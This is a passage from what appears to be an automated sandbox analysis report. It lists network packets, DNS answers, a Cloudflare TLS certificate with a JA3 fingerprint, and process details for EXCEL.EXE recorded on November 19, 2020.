Nov 19, 2020 08:40:55.589771032 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.596419096 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.596463919 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.942521095 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.972171068 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.972302914 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:55.973593950 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:56.003268957 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:56.005387068 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:56.005543947 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:56.008194923 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:56.028491974 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:56.038949966 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:56.058346033 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.747128010 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.747159004 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.747410059 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.748452902 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.748538017 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.763767958 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.792777061 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.792877913 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.793663025 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.822859049 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.826030970 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.826165915 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.827143908 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.837183952 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.855901957 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.866272926 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762340069 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762376070 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762401104 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762412071 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762428045 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762439013 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762459040 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762474060 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762511015 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.762543917 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.762712955 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762733936 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762764931 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.762778044 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.765209913 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.765243053 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 19, 2020 08:40:53.727904081 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Nov 19, 2020 08:40:53.741152048 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Nov 19, 2020 08:40:53.727904081 CET | 192.168.2.22 | 8.8.8.8 | 0xfbeb | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Nov 19, 2020 08:40:53.741152048 CET | 8.8.8.8 | 192.168.2.22 | 0xfbeb | No error (0) | 104.27.173.15 | A (IP address) | IN (0x0001) | ||
Nov 19, 2020 08:40:53.741152048 CET | 8.8.8.8 | 192.168.2.22 | 0xfbeb | No error (0) | 104.27.172.15 | A (IP address) | IN (0x0001) | ||
Nov 19, 2020 08:40:53.741152048 CET | 8.8.8.8 | 192.168.2.22 | 0xfbeb | No error (0) | 172.67.221.76 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Nov 19, 2020 08:40:53.839088917 CET | 104.27.173.15 | 443 | 192.168.2.22 | 49165 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Sun Nov 01 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020 | Mon Nov 01 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |
Code Manipulations |
---|
Statistics |
---|
System Behavior |
---|
General |
---|
Start time: | 08:40:44 |
Start date: | 19/11/2020 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f560000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|